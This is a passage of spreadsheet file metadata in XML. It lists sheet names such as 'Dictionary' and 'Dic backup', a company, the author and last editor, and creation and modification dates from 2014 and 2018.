      <vt:lpstr>(m1)_(m2)_(m3)</vt:lpstr>
      <vt:lpstr>Dictionary</vt:lpstr>
      <vt:lpstr>MAN</vt:lpstr>
      <vt:lpstr>Dic backup</vt:lpstr>
      <vt:lpstr>'(m1)_(m2)_(m3)'!Counter</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>QMD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Yang</dc:creator>
  <cp:lastModifiedBy>王振琦(Wang Zhenqi)</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-12-22T06:47:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-16T03:08:09Z</dcterms:modified>
</cp:coreProperties>
</file>